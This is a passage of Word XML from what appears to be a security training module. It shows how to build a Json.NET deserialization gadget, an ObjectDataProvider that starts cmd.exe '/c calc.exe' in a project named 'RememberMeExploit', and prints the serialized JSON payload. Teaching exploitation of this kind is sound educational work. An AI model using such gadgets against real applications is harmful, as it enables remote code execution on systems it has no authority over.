        <w:t xml:space="preserve"> installed, we can open it and create a new </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Console App (.NET Framework)</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FED14D" w14:textId="78F835FD"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67A518AC" wp14:editId="15124545">
            <wp:extent cx="5940425" cy="2194560"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="298684371"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194560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B02714"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We can reuse the code from the previous section to base our </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>ObjectDataProvider</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> object on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D7F545" w14:textId="77777777" w:rsidR="00682576" w:rsidRPr="00682576" w:rsidRDefault="00682576" w:rsidP="00682576">
      <w:pPr>
        <w:spacing w:after="0"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Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE92B15"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using System.Windows.Data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F26CEB9"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7ED5600D"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namespace RememberMeExploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD2D28D"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64E44090"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internal class Program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238DD03F"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127AC500"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static void Main(string[] args)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE448C0"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72C7A69E"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ObjectDataProvider odp = new ObjectDataProvider();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704FF66E"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odp.ObjectType = typeof(System.Diagnostics.Process);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ADBDB1"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odp.MethodParameters.Add("C:\\Windows\\System32\\cmd.exe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12530027"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odp.MethodParameters.Add("/c calc.exe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15398B46"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odp.MethodName = "Start";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA0AB42"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3DD6F0F9"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79E74CCE"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397A7E90"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There will be an error regarding </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>ObjectDataProvider</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve">. Visual Studio will not reference the necessary namespace by itself for this class, so it is necessary to hover over it, select </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Show potential fixes</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then select </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>using System.Windows.Data; (from PresentationFramework)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B561A61" w14:textId="6E238F11"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43B06489" wp14:editId="0C1DCBE4">
            <wp:extent cx="5940425" cy="2308225"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="343186625"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308225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="213EBA55"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Once that's cleared up, we can add the following lines to serialize the object with </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Json.NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> and print it out to the console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7F001A" w14:textId="77777777" w:rsidR="00682576" w:rsidRPr="00682576" w:rsidRDefault="00682576" w:rsidP="00682576">
      <w:pPr>
        <w:spacing w:after="0"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Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6933F29C"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JsonSerializerSettings settings = new JsonSerializerSettings()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EF2C9B"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5A8EF94B"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TypeNameHandling = TypeNameHandling.All</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FE9AEC"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778A200E"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string json = JsonConvert.SerializeObject(odp, settings);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FCAE81"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Console.WriteLine(json);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BF3040"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There will be another error, because </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Json.NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not an official </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Mircosoft</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> package and is therefore not installed by default. If you are using your own Windows VM for this module, you may simply head down to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Package Manager Console</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> and run the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Install-Package Newtonsoft.Json</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> to install it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AAF998" w14:textId="77777777" w:rsidR="00682576" w:rsidRPr="00682576" w:rsidRDefault="00682576" w:rsidP="00682576">
      <w:pPr>
        <w:spacing w:after="0"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Example 1: JSON </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3735F6BD" w14:textId="77777777" w:rsidR="00682576" w:rsidRPr="00682576" w:rsidRDefault="00682576" w:rsidP="0068257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sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Install-Package Newtonsoft.Json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C47852E"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If you are following along on the provided Tools VM, then we will need to add a reference to the DLL file manually. First, extract the ZIP file </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>C:\Tools\Newton_Soft_Json.zip</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a destination of your choosing. Next, inside Visual Studio, navigate to </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Project &gt; Add Reference...</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve">, select </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Browse</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> and find </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Bin\net45\Newtonsoft.Json.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> from wherever you extracted the ZIP file to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECD0B5A" w14:textId="3A7382F9"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="610DC4BE" wp14:editId="1F4BCFE7">
            <wp:extent cx="5940425" cy="3639185"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="745612612"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39185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B396D23"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Hit </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Add</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Ok</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>, and the reference errors should be cleared up. Now, we can build the program and run it. A calculator will spawn; however, there will be no serialized object for us to copy. Instead, an error message will be displayed since the serializer cannot determine certain information due to the new process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551CB1B4" w14:textId="2F2DF116"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68419938" wp14:editId="389B0C26">
            <wp:extent cx="5940425" cy="4216400"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="52253907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216400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DA2600"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Based on the error message above, the object was not serializable due to the system not being able to determine the </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>ExitCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve">. We don't need the calculator to spawn now, we just want to see the serialized output, so let's change the value of </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>MethodName</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Start1</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve">. The method </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Start1</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not actually exist, and it should not result in any calculator being spawned. Therefore, ideally, we should obtain serialized JSON output that we can manually modify. This time when we run the program, we get this output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F09F25" w14:textId="77777777" w:rsidR="00682576" w:rsidRPr="00682576" w:rsidRDefault="00682576" w:rsidP="00682576">
      <w:pPr>
        <w:spacing w:after="0"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Code: json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711643C7"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7E331483"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"$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A6E319"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"ObjectType": "&lt;SNIP&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0562F327"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"MethodName": "Start1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4016D411"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"MethodParameters": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D27328"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"$type": "&lt;SNIP&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12989D5A"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"$values": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D934AE"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"C:\\Windows\\System32\\cmd.exe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC6A66B"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 calc.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EB1AFB"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0776ED4C"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787A357A"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"IsAsynchronous": false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0362845B"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"IsInitialLoadEnabled": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757C546C"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"Data": null,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBFAA5F"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"Error": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF7D127"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"$type": "System.MissingMethodException, mscorlib",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1FD2C8"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"ClassName": "System.MissingMethodException",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E6282F"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"Message": "Attempted to access a missing member.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A071A2"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"Data": null,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67343688"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"InnerException": null,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591CE1B6"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"HelpURL": null,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440BE8F2"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"StackTraceString": "   at System.RuntimeType.InvokeMember(String name, BindingFlags bindingFlags, Binder binder, Object target, Object[] </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>providedArgs, ParameterModifier[] modifiers, CultureInfo culture, String[] namedParams)\r\n   at System.Windows.Data.ObjectDataProvider.InvokeMethodOnInstance(Exception&amp; e)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F45FFD"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"RemoteStackTraceString": null,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151318BF"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"RemoteStackIndex": 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A914D5"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"ExceptionMethod": "8\nInvokeMember\nmscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\nSystem.RuntimeType\nSystem.Object InvokeMember(System.String, System.Reflection.BindingFlags, System.Reflection.Binder, System.Object, System.Object[], System.Reflection.ParameterModifier[], System.Globalization.CultureInfo, System.String[])",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2990E0C2"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"HResult": -2146233070,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360B40DA"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"Source": "mscorlib",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C3C4E2"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"WatsonBuckets": null,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3964FC33"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"MMClassName": "System.Diagnostics.Process",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722C1228"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"MMMemberName": "Start1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC17C5F"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"MMSignature": null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCD1B75"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43A33444"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6718E998"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Taking a look at the JSON object, we can see that there is a long </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Error</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> section due to </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Start1</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> not being a valid method. We can just remove this and change </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Start1</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> back to </w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
      <w:r w:rsidRPr="00682576">
        <w:rPr>
